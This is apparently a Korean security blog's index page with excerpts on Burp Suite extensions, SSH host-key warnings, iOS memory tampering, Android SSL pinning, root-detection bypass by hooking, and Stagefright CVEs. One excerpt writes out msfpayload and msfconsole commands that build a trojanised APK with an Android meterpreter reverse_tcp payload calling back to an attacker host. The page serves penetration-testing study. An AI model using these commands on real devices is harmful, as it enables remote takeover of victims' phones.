분류 전체보기 (123) 썸네일형 리스트형 [Burp] Extender - burp Extender 기능 활용 웹 프록시로 사용하는 버프에는 Extender라는 기능이 있습니다. BApp Store에는 점검 시 유용한 도구들이 존재하는데 직접 만들기도 가능하여, 특정 문자열을 입력하면 자동으로 표시해주는 소스를 작성하였습니다. ### 환경구성 Burp Suite Professional (유료버전) Jython Windows(http://www.jython.org/downloads.html - 다운) Mac OS X ($ brew install jython - 터미널 설치) ### Windows 환경 설정 jython 홈페이지에서 jython 2.7.0 - Standalon Jar 를 다운받습니다. Extender - Options - Python Environment 에서 다운받은 jar를 추가합니다. #### .. [Burp] Extender - Burp Suite JSBeautifier 소스 : https://github.com/irsdl/BurpSuiteJSBeautifier 준비 jsbeautifier.jar lib/js.jar lib/rsyntaxtextarea.jar Extender - Options - Java Environment 에서 lib 폴더 추가 Extender - Extensions - Burp Extensions 에서 Extension file(.jar) 파일 추가 수동변경 자동변경 SSH 접속 시 RSA 공유키 충돌 Edit SSH 접속 시 RSA 공유키 충돌 SSH 접속 시 에러 발생 oneandonlymeui-MacBook-Pro:~ oneandonlyme$ ssh root@10.1.5.131 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle at.. iOS Memory 문자열 변조(String Edit in iOS Memory) 메모리 변조하는 방법에 대해서 일부 개발자만 동작원리와 개발하는 방법을 알고있다. 오늘 메모리 변조에 대한 기본 지식, 메모리 함수, 변조 방법까지 정리 할 예정이다. Part 1. 기본 개념 1. Process 프로세스 우리는 HelloWorld.c 컴파일을 하면 HelloWorld.exe을 실행 파일을 생성 수 있다. iOS/OSX는 실행 가능한 파일들이 모두 실행에 필요한 데이터와 명령어가 포함된 March-O 포맷으로 되어있다. 운영체제에서 해당 실행파일을 실행하면 우리는 그걸 프로세스라고 불른다. 사실 실행파일과 프로세스는 데이터와 명령어의 집합이 다른 상태의 같은 오브젝트(객체)이다. 실행 파일은 정적, 프로세스는 동적이라고 볼 수있다. 실행 파일은 하드 디스크에 저장되어있고 프로세스는 메모리.. Securing mobile banking on Android with SSL certificate pinning 애플리케이션과 서버간에 민감한 정보를 안전하게 전송하고 싶을 때, SSL 방식을 채택하여 사용할 것이다. 하지만 SSL 채택은 반만 맞는 이야기다. 애플리케이션과 서버간에 민감한 데이터를 전송하는 일은 빈번하다. 가장 대표적인 예로는 모바일 은행 애플리케이션이 있다. 가장 최악의 사황으로는 악의적인 해커가 당신의 은행 계좌 정보나 돈을 훔치거나 더 나쁜 행위를 저지를 수 있다. 모바일 뱅킹 솔루션에서 보안은 중요하기 때문에 데이터의 안전과 비밀성을 유지하기 위해서 SSL을 사용하는 것이다. 하지만 이러한 방법은 깨질 수 있다. Certificate pinning이란? SSL 연결을 만들 때 기본적으로 클라이언트는 서버의 인증서를 확인하게 된다. - 신뢰할수 있는 상위(root) 인증서를 검증 가능한 체인.. Android Rooting 체크 우회(Hooking with Cydia Substrate) 일부 금융 모바일 애플리케이션의 경우 Super user 권한을 임시 비활성화해도 정상 작동하지만 대부분의 금융 애플리케이션은 위변조를 통하여 Android 플랫폼 위변조를 탐지를 우회하게 된다. 하지만 최근 모바일 애플리케이션은 난독화, 재컴파일 방지, 위변조 탐지 등을 통해서 애플리케이션 위변조를 이용한 Super user 권한 탐지 우회가 어려워지고 있다. Android Hooking 후킹(영어: hooking)은 소프트웨어 공학 용어로, 운영 체제나 응용 소프트웨어 등의 각종 컴퓨터 프로그램에서 소프트웨어 구성 요소 간에 발생하는 함수 호출, 메시지, 이벤트 등을 중간에서 바꾸거나 가로채는 명령, 방법, 기술이나 행위를 말한다. 이때 이러한 간섭된 함수 호출, 이벤트 또는 메시지를 처리하는 코드를.. [Android Exploit] Android Exploit with metasploit metasploit reverse_tcp android http://exploiterz.blogspot.kr/2013/07/how-to-hack-android-devices-using.html 메타익스플로잇을 사용하여 안드로이드 Exploit Code가 포함된 APK 생성 및 리버스커넥션 연결하기 # ifconfig # msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > oneandonlyme.apk # msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handl.. [Android Exploit] Stagefright 취약점 Android 미디어 파일을 처리하는 Stagefright에서 다수의 정수 오버플로우 취약점이 발견되어 해커가 조작된 미디어 파일을 MMS를 이용하여 피해자로 전송할 경우 사용자의 인지 없이 원격 코드 실행 및 권한상승이 가능하다. 영향 받는 버전 안드로이드 2.2(Froyo) ~ 5.1.1_r5(Lollipop) Common Vulnerabilities and Exposures (CVE) 번호 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 테스트 https://www.exploit-db.com/exploits/38124/ exploit code를 실행하면 수많은 에러 메세지가 발생한다. Linux에서.. 이전 1 2 3 4 ··· 16 다음
